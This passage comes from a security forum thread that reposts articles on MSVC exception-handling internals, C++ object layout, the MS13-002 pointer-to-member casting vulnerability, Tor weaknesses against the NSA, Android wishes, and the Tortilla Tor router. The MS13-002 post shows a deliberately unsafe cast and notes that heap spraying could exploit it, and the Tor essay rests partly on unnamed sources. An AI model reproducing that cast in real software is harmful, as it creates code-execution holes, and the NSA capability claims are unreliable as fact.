"abc" push offset __TI1?PAD ; char * lea ecx, [ebp+_exc] push ecx call _CxxThrowException ; throw "abc"; loc_40109F: mov byte ptr [ebp+_state], 1 ; state 2 -> 1: destruct a2 lea ecx, [ebp+a2] call A::~A(void) jmp short func1_try0end ; catch (char * e)func1_try0handler_pchar: mov edx, [ebp+e] push edx push offset aCaughtS ; "Caught %s\n" call ds:printf ; add esp, 8 mov eax, offset func1_try0end retn ; catch (...)func1_try0handler_ellipsis: push offset aCaught___ ; "Caught ...\n" call ds:printf add esp, 4 mov eax, offset func1_try0end retn func1_try0end: mov [ebp+_state], 0 ; state 1 -> 0: }//try push offset aAfterTry ; "after try\n" call ds:printf add esp, 4 mov [ebp+_state], -1 ; state 0 -> -1: destruct a1 lea ecx, [ebp+a1] call A::~A(void) ; --- epilog --- mov ecx, [ebp+_next] mov large fs:0, ecx pop edi pop esi pop ebx mov esp, ebp pop ebp retnfunc1 endp func1_ehhandler proc near mov eax, offset func1_funcinfo jmp __CxxFrameHandlerfunc1_ehhandler endp func1_funcinfo dd 19930520h ; magicNumber dd 4 ; maxState dd offset func1_unwindmap ; pUnwindMap dd 1 ; nTryBlocks dd offset func1_trymap ; pTryBlockMap dd 0 ; nIPMapEntries dd 0 ; pIPtoStateMap dd 0 ; pESTypeList func1_unwindmap dd -1 dd offset func1_unwind_1tobase ; action dd 0 ; toState dd 0 ; action dd 1 ; toState dd offset func1_unwind_2to1 ; action dd 0 ; toState dd 0 ; action func1_trymap dd 1 ; tryLow dd 2 ; tryHigh dd 3 ; catchHigh dd 2 ; nCatches dd offset func1_tryhandlers_0 ; pHandlerArray dd 0 func1_tryhandlers_0dd 0 ; adjectivesdd offset char * `RTTI Type Descriptor' ; pTypedd -1Ch ; dispCatchObjdd offset func1_try0handler_pchar ; addressOfHandlerdd 0 ; adjectivesdd 0 ; pTypedd 0 ; dispCatchObjdd offset func1_try0handler_ellipsis ; addressOfHandler func1_unwind_1tobase proc neara1 = byte ptr -14h lea ecx, [ebp+a1] call A::~A(void) retnfunc1_unwind_1tobase endp func1_unwind_2to1 proc neara2 = byte ptr -18h lea ecx, [ebp+a2] call A::~A(void) retnfunc1_unwind_2to1 endp Let's see what we can find out here. The maxState field in FuncInfo structure is 4 which means we have four entries in the unwind map, from 0 to 3. Examining the map, we see that the following actions are executed during unwinding: state 3 -> state 0 (no action)state 2 -> state 1 (destruct a2)state 1 -> state 0 (no action)state 0 -> state -1 (destruct a1) Checking the try map, we can infer that states 1 and 2 correspond to the try block body and state 3 to the catch blocks bodies. Thus, change from state 0 to state 1 denotes the beginning of try block, and change from 1 to 0 its end. From the function code we can also see that -1 -> 0 is construction of a1, and 1 -> 2 is construction of a2. So the state diagram looks like this: Where did the arrow 1->3 come from? We cannot see it in the function code or FuncInfo structure since it's done by the exception handler. If an exception happens inside try block, the exception handler first unwinds the stack to the tryLow value (1 in our case) and then sets state value to tryHigh+1 (2+1=3) before calling the catch handler. The try block has two catch handlers. The first one has a catch type (char*) and gets the exception object on the stack (-1Ch = e). The second one has no type (i.e. ellipsis catch). Both handlers return the address where to resume execution, i.e. the position just after the try block. Now we can recover the function code: void func1 () { A a1; a1.m1 = 1; try { A a2; a2.m1 = 2; if (a1.m1 == a1.m2) throw "abc"; } catch(char* e) { printf("Caught %s\n",e); } catch(...) { printf("Caught ...\n"); } printf("after try\n"); } Appendix III: IDC Helper Scripts I wrote an IDC script to help with the reversing of MSVC programs. It scans the whole program for typical SEH/EH code sequences and comments all related structures and fields. Commented are stack variables, exception handlers, exception types and other. It also tries to fix function boundaries that are sometimes incorrectly determined by IDA. You can download it from MS SEH/EH Helper. Links and References [1] Matt Pietrek. A Crash Course on the Depths of Win32 Structured Exception Handling. A Crash Course on theDepths of Win32 Structured Exception Handling, MSJ January 1997 Still THE definitive guide on the implementation of SEH in Win32. [2] Brandon Bray. Security Improvements to the Whidbey Compiler. Security Improvements to the Whidbey Compiler - Visual C++ Internals and Practices - Site Home - MSDN Blogs Short description on changes in the stack layout for cookie checks. [3] Chris Brumme. The Exception Model. The Exception Model - cbrumme's WebLog - Site Home - MSDN Blogs Mostly about .NET exceptions, but still contains a good deal of information about SEH and C++ exceptions. [4] Vishal Kochhar. How a C++ compiler implements exception handling. How a C++ compiler implements exception handling - CodeProject An overview of C++ exceptions implementation. [5] Calling Standard for Alpha Systems. Chapter 5. Event Processing. http://www.cs.arizona.edu/computer.help/policy/DIGITAL_unix/AA-PY8AC-TET1_html/callCH5.html Win32 takes a lot from the way Alpha handles exceptions and this manual has a very detailed description on how it happens. Structure definitions and flag values were also recovered from the following sources: VC8 CRT debug information (many structure definitions) VC8 assembly output (/FAs) VC8 WinCE CRT source Sursa: OpenRCE
  11. [h=3]C++: Under the Hood[/h] This is an article written by Jan Gray. It is quite old, but most of the contents still apply today. The original article on MSDN can no longer be found. Here is the pdf version on OpenRCE: http://www.openrce.org/articles/files/jangrayhood.pdf. Overview: How are classes laid out? How are data members accessed? How are member functions called? What is an adjuster thunk? What are the costs: Of single, multiple, and virtual inheritance? Of virtual functions and virtual function calls? Of casts to bases, to virtual bases? Of exception handling? Sursa: C++: Under the Hood - Van's House - Site Home - MSDN Blogs
  12. The story of MS13-002: How incorrectly casting fat pointers can make your code explode swiat 6 Aug 2013 9:40 PM C++ supports developers in object-orientated programming and removes from the developer the responsibility of dealing with many object-oriented programming (OOP) paradigm problems. But these problems do not magically disappear. Rather it is the compiler that aims to provide a solution to many of the complexities that arise from C++ objects, virtual methods, inheritance etc. At its best the solution is almost transparent for the developers. But beware of assuming or relying on ‘under-the-hood’ behavior. This is what I want to share in this post - some aspects of how compilers deal with C++ objects, virtual methods, inheritance, etc. At the end I want to describe a real-world problem that I analyzed recently, which I called a “pointer casting vulnerability”. Pointers C vs C++ C++ introduces classes supported by the C++ language standard, which is a big change. Compilers need to take care of many problems, e.g. constructors, destructors, separating fields, method calling etc. In C we are able to create a function-pointer so why shouldn't we be able to create a pointer-to-member-function in C++? What does it mean? If we have a class with implementation of any method, from the C developer point of view this is just a function declared inside the object. C++ should allow us to create pointer to exactly this method. It is called a pointer-to-member-function. How can you create them? It is more complex than a function pointer in C. Let's see an example: class Whatever {public: int func(int p_test) { printf("I'm method \"func()\" !\n"); } }; typedef int (Whatever::*func_ptr)(int); func_ptr p_func = &Whatever::func; Whatever *base = new Whatever(); int ret = (base->*p_func)(0x29a); The definition of the function pointer is not much different comparing to C. But the way to call the function from the pointer obviously is because of the implied this pointer. At this point some magic happens. Why do we need to have an instance of the class and why we are using it as a base to call the pointer? The answer requires us to analyze what these “pointers” look like in memory. Normal pointers (known from C language) have size of a CPU word. If the CPU operates on 32 bit registers, a C-like pointer will be 32 bits long and will contain just a memory address. But the pointer-to-function-member C++ pointers mentioned above are sometimes also called “fat pointers”. This name gives us a hint that they keep more information, not just a memory address. The fat pointer implementation is compiler-dependent, but their size is always typically bigger than a function pointer. In the Microsoft Visual C++ a pointer-to-member-function (fat pointer) can be 4, 8, 12 or even 16 bytes in size! Why so many options and why is so much memory needed? It all depends on the nature of the class it's associated with. Classes and inheritance The nature of a “pointer to member function” is driven by the layout of the class for the member function that we’re wanting to point to. There are some excellent references on the details of C++ object layout – see [1,2] for example. We give just one example class and associated layout: consider two unrelated classes that derive from the same base class: class Tcpip {public: short ip_id; virtual short chksum(); }; class Protocol_1 : class Protocol_2 : virtual public Tcpip { : virtual public Tcpip { public: public: int value_1; int value_2; virtual int proto_1_init(); virtual int proto_2_init(); }; These two classes could be written by completely different developers or even companies. They don't need to be aware of each other. Now we imagine the situation that a third company wants to write a wrapper for these two protocols and export APIs that are independent of the specification of either. The new class could look like this: class Proto_wrap : public Protocol_1, public Protocol_2 { public: int value_3; int parse_something(); }; Note that having declared Protocol_1 as Protocol_1 with virtual inheritance means that there is a single version of ip_id (and chksum()) in the memory layout and the statement pProtoWrap->chksum(); is unambiguous. The layout of a Proto_wrap object is: (Without the virtual inheritance, each of Protocol_1 and Protocol_2 would have its own copy of the ip_id member, leading to ambiguity if we were to try something like: int a = pProto_wrap->ip_id ) Pointer-to-member-function (fat pointers) Now that we have recalled some relevant background we can return to the original problem. Why are pointer-to-member-function bigger than a C-style function pointer? The Microsoft VC++ compiler can generate pointer-to-member-function (fat pointers) that are 4, 8, 12 or even 16 bytes long [3,4]. Why are there so many options and why do they need so much memory? Hopefully thinking about the object layout example above provides some hints... If we create a pointer-to-member-function to a static function it will be converted to a normal (C-like) pointer and will be 4-bytes long (on 32 bits arch, in other case CPU word size). Why? Because static functions have a fixed address that is unrelated to any specific object instance. In the single inheritance case, any member function can be referred to as an offset from a single ‘this’ pointer. In the multiple inheritance case however, given a derived object (e.g. Proto_wrap) it is not the case that its ‘this’ pointer is valid for each base class. Rather ‘this’ needs to be adjusted depending on which base class is being referred to. In this case “fat pointer” will be 2 CPU words long: | offset | “this” | See [5] for a more detailed walkthrough. Additionally if our object uses virtual inheritance (the layout example given in the previous section), then we need to know not only which of the vtables is relevant (Protocol_1’s or Protocol_2’s) but also the offset within that corresponding to the member function that we’re wanting to point to. Inthis case the pointer-to-member-function size will be 12 bytes (3 CPU words size). This is not the end… You can also forward declare an object and in this case the compiler has no idea about its memory layout and will allocate a 16-byte structure for the pointer-to-member-function unless you specify the kind of inheritance associated with the object via special compiler switches/pragmas. [3,4]. So now I will try to explain some interesting security-related behavior which I met during my work… C++ pointer casting vulnerability Let's analyze the following skeleton example. We have a base class, which is virtually inherited by two further classes: RealData holds some data ; Manage can process specific types of data; ‘BYTE *_ip’ is used as the means to direct which of Manage’s processing methods should be called. class UnknownBase;class RealData { friend Manage; public: ... ULONG_PTR _lcurr; // some real data... int _flags; int _flags2; int _flags3; }; class Manage : public virtual UnknownBase { friend class ProcessHelper; public: BYTE * _ip; RealData * _curr; ... }; class ProcessHelper : virtual UnknownBase { public: typedef LONG_PTR (Manage::*ManageFunc)(); struct DummyStruct { ManageFunc _executeMe; // pointer to member function! }; ... }; LONG_PTR Manage::frame() { LONG_PTR offset = (this->*(((ProcessHelper::DummyStruct *) _ip)->_executeMe))(); return offset; } The key to this vulnerability is the rather convoluted cast in Manage::frame(). Note the types involved: _ip is of type BYTE * type ProcessHelper:: DummyStruct is a struct with a pointer-to-function member type ManageFunc So the ‘BYTE *’ data is actually being cast (in a roundabout way via a struct) to a ManageFunc pointer-to-member-function type, ie the instruction is really equivalent to: LONG_PTR offset = ((ManageFunc)_ip)();However the compiler errors out on such a statement, flagging that ‘BYTE *’ and ‘ManageFunc‘ are incompatible types (different sizes in particular!) to be casting to and from. It appears here that the developer worked round the compiler error by introducing the ‘struct DummyStruct’ subterfuge: they assumed that under the hood the ManageFunc really was just a standard pointer, and were able to indirectly achieve the incorrect cast… C/C++ will always allow the persistent developer to eventually do the wrong thing. Let’s run through how this breaks in practice. We create the following instances: Manage *temp_manage = new Manage; Real_block *temp_real_block = new RealData; To illustrate the issue we might set up the ‘flags’ members as follows: temp_real_block->_flags = 0x41414141; temp_real_block->_flags2 = 0x41414141; temp_real_block->_flags3 = 0x41414141; And let’s suppose the code does something like the following: temp_manage->_ip = (BYTE *)&temp_real_block->_lcurr; temp_manage->frame(); // does the (ManageFunc)_ip) cast This leads to a crash - after casting to the DummyStruct structure with pointer-to-member-function our base casting expects to have a fat pointer memory layout associated with virtual inheritance, specifically expecting to find vbtable offset information at the 3rd CPU word: this value is taken and added to the whole pointer. In our case, _ip was pointing at _lcurr and so we have the following adjacent data: ULONG_PTR _lcurr; int _flags; int _flags2; int _flags3; So here, the arbitrary _flags data will be added to the memory address _lcurr in an attempt to form the address of the member function. Note that RTTI (run-time type information) does not help here; the incorrect cast is directly computing an incorrect memory address to call. The security consequences are potentially severe - full remote code execution (RCE). In such an incorrect ‘standard pointer’ to ‘pointer-to-member-function’ cast scenario, the data adjacent to the standard pointer will be used to calculate the address of the member function. If the attacker controls this then by choosing suitable values here, he can cause that address calculation to result in a value of his choosing, thus gaining control of execution. In the real vulnerability we didn’t have direct control over what will be written to the “_flags” field. But we were able to execute some code path which set “_flags” value to not zero – the number 2 (two). So we were able to set “_flags” to the value 2 and then execute vulnerable code. Because pointer was badly calculated (because 2 was added to the pointer), memory which was cast to the structure had bad values. Inside of the structure was function pointers and because they were shifted by 2 bytes, they were pointing somewhere in memory which always was somewhere in the heap range. An attacker could spray the heap and thus control this. [6] Summarize The higher level a language, the more problems the associated compilers must solve. But the developer is ultimately responsible for writing correct code. Typically C/C++ compilers will ultimately allow you to cast to and from unrelated types (C pointers to pointers-to-member-functions for example) and back again. Developers should avoid such illegal activity, take careful note of compiler warnings that occur when they break the rules, and be aware that if they persist they’re on their own… Microsoft Visual Compiler detects described situation and inform developers about that by printing appropriate message: error C2440: 'type cast' : cannot convert from 'BYTE *' to 'XXXyyyZZZ'. There is no context in which this conversion is possible. Btw. I would like to thanks following people for help with my work: Tim Burrell (MSEC) Greg Wroblewski (MSEC PENTEST) Suha Can Best regards, Adam Zabrocki References [1] Reversing Microsoft Visual C++ Part II: Classes, Methods and RTTI [2] C++: under the hood [3] MSDN: Inheritance keywords [4] MSDN: pointers-to-members pragma [5] Pointers to member functions are very strange animals [6] Microsoft Security Bulletin MS13-002 - Critical : Vulnerabilities in Microsoft XML Core Services Could Allow Remote Code Execution (2756145) Sursa: The story of MS13-002: How incorrectly casting fat pointers can make your code explode - Security Research & Defense - Site Home - TechNet Blogs
  13. Anonymity Smackdown: NSA vs. Tor By Robert Graham In recent news, Tor was hacked -- kinda. A guy hosting hidden services was arrested (with help from FBI), and his servers changed to deliver malware to expose user IP addresses (with help from NSA). This makes us ask: given all the recent revelations about the NSA, how secure is Tor at protecting our privacy and anonymity? The answer is "not very". Tor has many weaknesses, especially the "Tor Browser Bundle". I'm going to describe some of them here. The NSA runs lots of Tor nodes The NSA hosts many nodes, anonymously, at high speed, spread throughout the world. These include ingress, middle nodes, hidden services, and most especially, egress nodes. It's easy for them to create a front company, sign up for service, and host the node virtually anywhere. On any random Tor connection, there is a good chance that one of your hops will be through an NSA node. Update: This is a controversial claim. I have some sources I cannot name. Also: I don't have the exact details as to what "many" means: 1%? 10% 30%?? Tor uses only three hops By default, Tor chooses three hops: the ingress point, the egress point, and only a single in-between node. If the NSA is able to control one or two of these nodes, you are still okay because the third node will protect you. But, if the NSA is able to control all three, then your connection is completely unmasked. This means that the NSA occasionally gets lucky, when somebody's connection hits three NSA nodes, allowing them to unmask the user. Update: If we assume the NSA controls 1% of Tor nodes, that comes out to one-in-a-million chance the NSA will unmask somebody on any random connection. If a million connections are created per day, that means the NSA unmasks one person per day. Tor creates many new paths Tor doesn't use a single static path through the network. Instead, it opens up a new path/tunnel every 15 minutes. Modern web-services create constant background connections. Thus, if you have your Outlook mail or Twitter open (and aren't using SSL), these will cause a new path to be created through the Tor network every 15 minutes, or 96 new paths every day, or 3000 new paths a month. That means over the long run, there's a good chance that the NSA will be able to catch one of those path with a three-hop configuration, and completely unmask you. Update: This is partly mitigated by the "guard" ingress node concept. You crease only a single connection to the guard node, then fan out paths from there. But, mitigated doesn't mean the same thing as "fixed". Your egress traffic may be unencrypted Tor encrypts your traffic on your end, but when it leaves the last node in the Tor network, it'll be whatever it would be originally. If you are accessing websites without SSL, then this last hop will be unencrypted. It's usually easy to verify within web-browsers whether they are using SSL, but most other apps have bugs that cause unencrypted sessions to be created. Update: Also, some of your egress traffic is poorly encrypted, such as the 1024-bit keys without forward security that Facebook uses. Update: @addelindh points out that things like SSLstrip often works because people aren't paying attention and websites don't support things like HSTS, and thus, even when you want SSL, it'll sometimes fail for you in the face of a hostile attacker. Somebody needs to setup an exit node, then SSLstrip it to figure out how often that works. Tor uses 1024-bit RSA DH Tor connections are only protected by 1024-bit RSA keys. The NSA can crack those keys. We don't know how easily they can do it. I'm guessing the NSA spent several years and a billion dollars to build ASICs. That means, their internal accounting might charge $1-million per 1024-bit RSA key cracked. This means they won't try to crack keys for petty criminals, but they have the power to crack keys for serious targets. The NSA doesn't need to control all three servers along your route through Tor. Instead, it can control two servers and crack the RSA key of the remaining connection. Update: We know the NSA can crack 1024-bit keys, because would cost only a few million dollars. What we don't know how many such keys it can crack per day. The number could be less than one such key per day. Major Update: Because of Tor's "perfect forward secrecy", the NSA wouldn't be cracking the RSA key when eavesdropping. Instead, they would need to crack the "ephemeral" keys. A lot of older servers use 1024-bit DH ephemeral keys, which are about as easy to break as 1024-bit RSA keys. Newer servers use 256-bit ECDH keys which are a lot stronger, and likely not crackable by the NSA (estimates say NSA can crack up to 160-bit ECDH keys). Thus, for older servers, the ability of the NSA to passively eavesdrop and crack keys is a big threat, but for newer servers, it's likely not a threat. (I'm using Keylength - Cryptographic Key Length Recommendation and round numbers here for key lengths). (I'm using TorStatus - Tor Network Status and my own pcaps to confirm a lot of 1024-bit DH is still out in the Tor nodes). The NSA can influence parts of the network The NSA can flood the servers it doesn't control with traffic, thus encouraging users to move onto their own servers. Thus, they can get more connections onto their servers than chance would suggest. Multiple apps share the same underlying Tor egress Let's say that you use SSL for Twitter, but non-SSL for your email app. Both of these go out the same exit node. This allows the the NSA to associate the two together, the user named in the email connection associated with the otherwise anonymous Twitter connection. This association works well when the NSA is controlling the exit node, and less well if it's simply monitoring the exit node. Outages out you As everyone knows, if the NSA is monitoring you and the server you visit, they might be able to match up traffic patterns to associate the two. This is tricky for them, so a better way is to control the association by injecting faults. If the NSA is able to reset (spoof TCP RST) packets to your end of the connection, it'll cause the egress connection on the other end to drop. Some suspect the NSA is doing this in order to find hidden services. Exploits (0day or not) can leak your IP address In the recent incident, the FBI put a Firefox exploit on the servers that was designed to leak a person's IP address. There are lots of other things that can do this, ranging from hidden stuff within video files to PDF files. I doubt that it is possible, in the normal sense (i.e. without putting the Tor proxy and apps on separate machines), to prevent your IP address from being discovered. DNS leakages can get you This is partially fixed, with the latest build of Firefox in the Tor Browser Bundle. But it's potentially broken in other apps. The basic problem is that Tor is TCP-based, but DNS requests go over UDP. Also, DNS requests go over separate APIs in the operating system that bypass the proxying of Tor. Consequently, when apps open a proxied TCP connection, they'll still leak your IP address when resolving a name via DNS. (h/t @inthecloud247) Mistakes inevitably happened Remember: Lulzsec hacker Sabu was discovered because while he normally logged onto chatrooms using Tor, he forgot once -- and once was enough. The NSA passes info to the FBI !!! Normally, the NSA wouldn't go after petty criminals, like kids buying drugs on SilkRoad. That's because doing so would reveal the existence of the program, which the NSA wants to keep secret. But now we've heard stories about how the NSA can give such information to FBI without revealing the program. Unmasking connections is opportunistic: the NSA is just running a huge dragnet and testing connections when they get lucky. With the above program, they can just pass it along to the FBI. That means even the pettiest of petty criminals might getting caught with the NSA's Tor monitoring. Conclusion Experts can probably use Tor safely, hiding from the NSA -- assuming they control a smaller number of nodes, and that their 1024-bit key factoring ability is small. It would require a lot of opsec, putting apps on a different [virtual] machine than the proxy, and practicing good opsec to make sure egress connections are encrypted. However, the average person using the Tor Browser Bundle is unlikely to have the skills needed to protect themselves. And this might be good thing: it means dissidents throughout the world can probably hide from their own government, while our NSA cleans the network of all the drug dealers and child pornographers. Update: Some comments might appear on the Tor mailing list here.Sursa: Errata Security: Anonymity Smackdown: NSA vs. Tor
  14. Android 5.0 Key Lime Pie: 12 features we want to see Updated: Visual voicemail, revamped messaging and enhanced multitasking are just some of things we'd like to see. Android 5.0 will be the next edition of the world's most popular smartphone operating system, and could be set for release in late October. Developed under the codename Android Key Lime Pie (KLP), this version of the software is a major refresh and is expected to introduce a raft of features as well as a boost in performance. According to reports, Google is planning to release the latest version of its mobile operating system in October to coincide with Android's fifth birthday, and the release of the Motorola X device. The new OS is also expected to run on a much wider range of devices than Android 4.2 Jelly Bean, including those with 512 MB of RAM. IT Pro has compiled a list of 10 other improvements we'd like to see in Android 5.0. Do you agree? Are there any features you'd like to see Google introduce? Let us know below. 12. Improved security Despite its popularity, security is still a core problem for the Android platform. This is primarily down to the Google Play store being a infiltrated with apps containing malware malware, but isn’t the only cause. Most recently, Bluebox Security discovered a “Master Key” flaw, which means that 99 per cent of devices vulnerable (900 million) can be hacked. A patch is being rolled out as we speak, it’s another major sign that Google needs to do more to ensure its devices are safer. 11. Performance profiles We’ve already got the ability to toggle between silent and flight mode, but enhanced profiles which can be customised to alter the performance levels of the device will be invaluable as they can help to save battery life or boost CPU speeds for complex tasks . OEMs such as Motorola and Samsung already offer users things such as Blocking Mode and Smart Actions, respectively. We would like to see Google step up and offer a variety of modes built into Android, especially for its Nexus range. These will allow the user to save battery overnight, turn up performance when carrying using the device for gaming/multimedia and settings for in between. 10. Visual voicemail There are apps which provide this service in the US, but there is little love for users in the UK. Google and its OEM partners should use their close ties with carriers to kickstart this service in the UK. A native app would be useful to people who are frequently in meetings as they can quickly check whether a voicemail they have received is urgent. 9. Beef up Google Now Google Now was introduced in 2011 as part of Android Jelly Bean 4.1, but it's usefulness is largely restricted to the US. In the UK, the software primarily functions as a reminder tool for events you may have – and is always on hand to show you how long it will take to get home from any given location. We expect Google to make some more partnership announcements, which will extend the usefulness of Now outside of the grand ol’ USA. 8. Ability to turn off OEM skins on any device When Android 5.0 KLP launches, it is expected to arrive on a brand-new handset carrying Google’s 'Nexus' branding. Likely to be dubbed the Nexus 5, this smartphone will ship with the vanilla version of Android, and will be developer friendly. OEMs such as HTC, LG and Samsung will place their custom skins over the top of Android KLP when it is released on their handsets to differentiate them. It would be good if Google built-in a master switch into Android, giving users the choice to switch off these OEM skins without having to root devices. The chances of this happening though are virtually zero. OEMs such as HTC and Samsung add features which will only work with their respective skins active, and they are not going to want to let users disable them. Google is unlikely to pull rank on its partners too – as it feels that one of the strengths of the operating system is its customisation. 7. Child/Business-friendly modes as standard Kids Corner was a useful feature that Microsoft introduced in the Windows Phone 8 OS. Microsoft effectively built a sandbox into the mobile OS, allowing users to lockdown sensitive information like emails, while allowing kids to access features such as games. It would be good to see Google incorporate a similar feature into Android. BlackBerry built-in its Balance feature into Z10 smartphones. This allows IT admins to separate business and personal data – and means that employees cannot copy sensitive information from one side to the other. It also means when a user leaves an organisation, the business side of the handset can be wiped without affecting the personal information. Samsung is already trying to make inroads into the enterprise by launching a Secured Edition of Android known as Knox. This aims to replicate the functionality of BlackBerry Balance, so it is possible to do so. 6. Find my Droid You'd expect a simple feature like this to be included in a comprehensive system such as Android, but it has yet to materialise. With the firm’s extensive mapping service, and GPS included into handset, it shouldn’t be too much of a stretch for Google to build this functionality into the heart of the OS. 5. Revamped messaging This is the feature which has been talked about extensively, due to information leaking. It will be interesting to see to how Google goes about tackling messaging in a world where apps such as Whatsapp dominate. Google's "Babel” service is expected to allow users to access messages across Android smartphones and tablets. The web giant is also tipped to launch clients for other popular platforms such as iOS. Folks over at the Google Operating System blog found a javascript file on Gmail servers appearing to confirm the existence of Babel and some of the key features it will include: Redesigned conversation-based UI Access conversation lists from smartphones, tablet and PCs Advanced group conversations Ability to send pictures Improved notifications across devices 4. Offline maps and better control over location settings Nokia has been leading the way in this field by allowing users to download comprehensive guidance and then use it for free offline. Google already offers comprehensive guidance through its Maps and Navigation apps, but it does crunch through battery when in use. Privacy hasn't been a strong point for Google, with the firm receiving numerous fines about collecting data from individuals. A way in which Google could try and rebuild its privacy image would be to let users choose whether they want to share their location. iOS already allows users to turn off location services on individual apps if they choose to. This feature would be welcome on Android so you don’t have all your apps sending off data. Of course it would help to save battery life too. 3. Improved battery life and performance There are whispers that Google will upgrade the framework of Android to the Linux 3.8 Kernel. What does this mean for regular users? In short, such an upgrade should make Android less memory hungry. Devices should become more efficient as they gobble up less RAM for tasks and inturn this should result in improved battery life. Google introduced its Project Butter initiate with Jelly Bean to help solve the latency issues Android was experiencing. This has gone a long way toward reducing the perceived “lag” associated with Android. Improvements to Butter are expected. 2. Enhanced multitasking Android has been at the forefront of mobile computing when it comes to features such as multitasking. Users are able to run multiple apps at the same time and flick between them. With the forthcoming Galaxy S4, Samsung will allow users to snap two apps onto the screen of the 5in device, so they can be used at the same time. It’ll be possible to watch videos when replying to emails, or surf the internet and make notes. It would be great to see Google take the initiative and make a multitasking feature like this standard across all high-end handsets. 1. Complete Android backup Although it is possible to sync key features such as contacts and apps with a Gmail account – a full blown native backup is lacking from Android handsets. When you switch between Android handsets, photos, music and text messages are lost in the transition, as are any customisations you have made. Apple already has a cloud backup service, which works well when you upgrade your iPhone– and we hope Google will introduce something similar to this with Android KLP. This article was originally published on 24 April, but has since been updated to include further release date information. Sursa: Android 5.0 Key Lime Pie: 12 features we want to see | IT PR
  15. Tortilla v1.0.1 Beta by Jason Geffner (jason@crowdstrike.com) and Cameron Gutman (cameron@crowdstrike.com) Tortilla is a free and open-source solution for Windows that transparently routes all TCP and DNS traffic through Tor. This product is produced independently from the Tor® anonymity software and carries no guarantee from The Tor Project about quality, suitability or anything else. LICENSE Please see the LICENSE.txt file for complete licensing details. BUILD INSTRUCTIONS This distribution comes with a pre-built version of Tortilla.exe. If you would like to use the pre-built Tortilla.exe, you may skip to USAGE INSTRUCTIONS. Otherwise, follow the steps below to build Tortilla.exe with Visual Studio. Note: Building Tortilla will require WDK 8.0 or higher. 1. Open the Tortilla.sln solution in Visual Studio 2. If you would like to use your own driver signing certificate instead of the test-signed certificate distributed with this distribution, update the Driver Signing Configuration Property in the TortillaAdapter project and the TortillaAdapter Package project 3. In the Visual Studio menu bar, select BUILD -> Batch Build... 4. In the Batch Build window, check the following items: InstallTortillaDriver Debug Win32 InstallTortillaDriver Debug x64 InstallTortillaDriver Release Win32 InstallTortillaDriver Release x64 Tortilla Debug Win32 Tortilla Release Win32 TortillaAdapter Vista Debug Win32 TortillaAdapter Vista Debug x64 TortillaAdapter Vista Release Win32 TortillaAdapter Vista Release x64 TortillaAdapter Package Vista Debug Win32 TortillaAdapter Package Vista Debug x64 TortillaAdapter Package Vista Release Win32 TortillaAdapter Package Vista Release x64 5. In the Batch Build window, press the Build button The driver package files, InstallTortillaDriver.exe, and the default Tortilla.ini file all get embedded in Tortilla.exe (created in the \Debug and \Release directories). You need not distribute anything other than Tortilla.exe. USAGE INSTRUCTIONS The usage instructions below apply to your host operating system. All of Tortilla's components exist on the host operating system. No Tortilla files need to be copied into your virtual machine. 1. If your host system is Windows Vista or later and the Tortilla driver package is signed with a test-signed certificate, configure your system to support test-signed drivers - The TESTSIGNING Boot Configuration Option (Windows Drivers) 2. Download the Tor Expert Bundle from https://www.torproject.org/download (expand the Microsoft Windows drop-down and download the Expert Bundle) 3. Install the Tor Expert Bundle and run Tor 4. Run Tortilla.exe; this will install the Tortilla Adapter as a virtual network adapter and will run the Tortilla client 5. Configure a virtual machine to use the Tortilla Adapter as its network adapter For VMware, open Virtual Network Editor, edit or add a new VMnet network, and bridge that VMnet to the Tortilla Adapter. In your virtual machine's Virtual Machine Settings, set the Network Adapter's Network connection to Custom and select the VMnet that was bridged to the Tortilla Adapter. 6. In your virtual machine's guest operating system, ensure that the network adapter's TCP/IPv4 protocol is configured to obtain an IP address automatically via DHCP (Tortilla acts as a simple DHCP server) 7. Use your VM to access the Internet; all TCP and DNS traffic will be automatically and transparently routed through Tor 8. If you like, you may edit the Tortilla.ini file created by Tortilla.exe; restarting Tortilla.exe will cause it to use the configuration in Tortilla.ini UNINSTALLATION INSTRUCTIONS 1. Delete Tortilla.exe 2. Delete Tortilla.ini 3. Open Device Manager in Windows, expand the list of Network adapters, and delete the Tortilla Adapter RELEASE NOTES 1.0.1 Beta -- Driver initialization fix + client fix for DHCP broadcasts 1.0 Beta -- Initial release Download: https://github.com/CrowdStrike/Tortilla/tree/master/Tortilla Sursa: https://github.com/CrowdStrike/Tortilla
  16. Nytro

    Curiozitate HttpS

    Descarca OpenSSL (in cazul in care stii C) si uita-te in sursa: http://www.openssl.org/source/openssl-1.0.1e.tar.gz O sa gasesti acolo cam toti algoritmii pe care ii cauti. De asemenea exista multe librarii cu care poti testa efectiv algoritmii, de exemplu mcrypt pentru PHP. Pentru explicatii despre modul in care functioneaza gasesti destule explicatii pe Google/Wikipedia. Sincer, iti recomand o carte de cryptografie, nu stiu insa care anume. Cauta una mai complexa in cazul in care esti foarte interesat de subiect. Cauta problemele de securitate care apar cu diversi algoritmi: - https://rstforums.com/forum/73411-step-into-breach-https-encrypted-web-cracked-30-seconds.rst - https://rstforums.com/forum/72746-how-digital-certificates-used-misused.rst - https://rstforums.com/forum/73266-step-into-breach-new-attack-developed-read-encrypted-web-data.rst - https://rstforums.com/forum/70778-how-nsa-access-built-into-windows.rst - https://rstforums.com/forum/69666-advanced-cryptography.rst - https://rstforums.com/forum/68262-crypto-2012-breaking-repairing-gcm-security-proofs.rst - https://rstforums.com/forum/67417-new-rc4-attack.rst - https://rstforums.com/forum/66787-stanford-javascript-crypto-library.rst - https://rstforums.com/forum/66739-failures-secret-key-cryptography.rst - https://rstforums.com/forum/66643-another-crypto-attack-ssl-tls-encryption.rst - https://rstforums.com/forum/66368-cryptographic-primitives-c.rst - https://rstforums.com/forum/66073-botan-c-crypto-algorithms-library-1-10-5-a.rst - https://rstforums.com/forum/64975-attack-week-tls-timing-oracles.rst - https://rstforums.com/forum/64725-unlucky-you-uk-crypto-duo-crack-https-lucky-13-attack.rst - https://rstforums.com/forum/64163-crypto-cops-law-key-disclosure-forced-decryption.rst - https://rstforums.com/forum/63693-security-evaluation-russian-gost-cipher.rst - https://rstforums.com/forum/62592-crypto-pentesters.rst - https://rstforums.com/forum/62126-pgp-truecrypt-encrypted-files-cracked-300-tool.rst Sunt foarte multe resurse disponibile chiar si aici, timp si initiativa sa ai.
  17. Nytro

    Curiozitate HttpS

